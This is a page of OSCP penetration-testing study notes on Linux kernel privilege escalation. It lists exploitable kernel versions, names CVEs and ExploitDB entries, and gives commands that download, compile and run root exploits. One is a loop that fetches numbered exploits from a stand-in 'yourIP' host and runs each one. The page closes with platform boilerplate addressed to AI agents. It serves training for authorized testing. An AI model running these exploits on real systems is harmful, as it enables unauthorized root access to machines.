> For the complete documentation index, see [llms.txt](https://gabb4r.gitbook.io/oscp-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/kernel-exploitation.md).

# Kernel Exploitation

* Kernels are the core of any operating system.
* Think of it as a layer between application software and the actual computer hardware.
* The kernel has complete control over the operating system. Exploiting a kernel vulnerability can result in execution as the root user.

## Finding kernel exploit

1. **Enumerate kernel version - `uname -a`**
2. **Find matching exploits ( Google, ExploitDB, Github)**
3. **Compile and run.**

note: Beware though, as Kernel exploits can often be unstable and may be one-shot or cause a system crash.

### Linux Local Exploit

```
linux-exploit-suggester
unix_privesc_check
kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)
```

### Other exploits

* Linux Kernel 2.6.39 - 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation:
  * <https://www.exploit-db.com/exploits/18411/>
  * <https://www.securityfocus.com/bid/51625/info>
  * CVE-2012-0056
* Linux Kernel 2.6.22 - 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method):
  * <https://www.exploit-db.com/exploits/40616/>
  * CVE-2016-5195
* Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
  * <https://www.exploit-db.com/exploits/3/>
  * <http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c>
  * CVE-2003-0127
* Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV below 1.4.1 - Local Privilege Escalation (1)
  * <https://www.exploit-db.com/exploits/8478/>
  * exploit/linux/local/udev\_netlink

### Exploits worth running

* Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

  ```
  https://www.exploit-db.com/exploits/37292
  ```
* CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

```
https://www.exploit-db.com/exploits/15285/
```

* Linux Kernel <= 2.6.37 'Full-Nelson.c'

```
https://www.exploit-db.com/exploits/15704/
```

* CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)

```
https://git.zx2c4.com/CVE-2012-0056/about/
```

* Linux CVE 2012-0056

```
wget -O exploit.c <http://www.exploit-db.com/download/18411>

gcc -o mempodipper exploit.c

./mempodipper
```

* CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

```
https://dirtycow.ninja/
```

* Compile dirty cow:

```
 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
```

* Cross compiling exploits

```
gcc -m32 -o output32 hello.c #(32 bit)

gcc -m64 -o output hello.c # (64 bit)
```

* Linux 2.6.32

```
https://www.exploit-db.com/exploits/15285/
```

* Elevation in 2.6.x:

```
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/kernel-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.